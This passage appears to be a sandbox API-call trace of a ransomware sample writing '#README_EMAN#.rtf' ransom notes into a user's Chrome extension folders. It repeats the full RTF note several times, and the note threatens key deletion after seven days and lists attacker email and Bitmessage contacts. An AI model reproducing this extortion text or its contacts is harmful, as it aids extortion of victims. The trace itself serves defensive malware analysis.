reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.738] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.739] CloseHandle (hObject=0x2cc) returned 1 [0283.739] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\#readme_eman#.rtf")) returned 0x20 [0283.739] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0283.739] GetLastError () returned 0x2 [0283.739] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the 